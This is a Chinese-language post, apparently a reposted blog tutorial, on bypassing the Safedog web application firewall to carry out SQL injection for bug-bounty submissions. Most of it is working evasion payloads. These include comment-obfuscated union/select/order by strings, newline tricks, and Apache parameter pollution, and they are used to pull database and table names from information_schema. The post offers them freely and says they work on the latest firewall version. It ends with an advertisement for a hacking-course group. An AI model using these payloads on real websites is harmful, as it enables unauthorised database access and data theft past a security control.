安全狗绕过小结+SRC中关于sql注入的总结
group?by/*!order?/*/*%/**/by*/4--?-/*!union/*!/*/**/*/select/**//*!database/*!/*/**/*/()/**//*!order/*!/*/**/*/by/**//*!union/*!/
这些对最新版本的安全狗也有用,本地测试通过过。 group?by
有点乱上面是随便贴的,有需要的自取 我一时半会儿我暂时没找到有安全狗的网站 就直接用DNS那个有安全狗的靶场来测试 先group by和/*!order /*/*%/**/by*/2-- -的测试可行 然后就直接去找回显点。 这里输入/*!14400union*/-- hh%0aselect-- hh*/%0a 1,2绕过成功 这里我看了下是apache,那么就可以试试参数污染 然后就直接输入?id=2/*&id=1123 union select 1,2-- hh*/也能绕过。 如果有不懂的学弟,这里解释一下原因,可以先试一试? id=2&id=1会发现显示的是id=1的画面,原因是apache下会执行后面的及id=1的 然后因为/*&id=1123 union select 1,2-- hh*/这里安全狗会认为是注释内容所以就不会拦截 但是因为是执行后面的内容即id=1123 union select 1,2-- hh*/的内容 又因为-- hh*/这一段,所以就会把*/注释掉(本来打算是用#号的,但是不知道为什么不行…) 这里可以直接把2换成/*!database/*!/*/**/*/()/**/就可以得到库名,这个时候在SRC中是可以直接去提交的。 然后就去找表名了 输入?id=1213123/*!14400union*/— hh%0aselect— hh*/%0a 1,group_concat(table_name) from — hh/* %0a`information_schema`.`tables`— hh*/ where table_schema=/*!database/!//**/*/()/**/ 表名找到,后面的就不想弄了,步骤都差不多...... 封神台靶场实战演练网站安全狗,每天离黑客大佬更近一步 扫描下方二维码 邀你进内部交流群,领靶场链接!工具!零基础体制化视频教程 往期内容回顾 扫码立即免费领取 黑客教程视频 靶场工具 讲师课件 一线安全工程师每天在线直播授课 (编辑:成都站长网) 【声明】本站内容均来自网络,其相关言论仅代表作者个人观点,不代表本站立场。若无意侵犯到您的权利,请及时与联系站长删除相关内容! |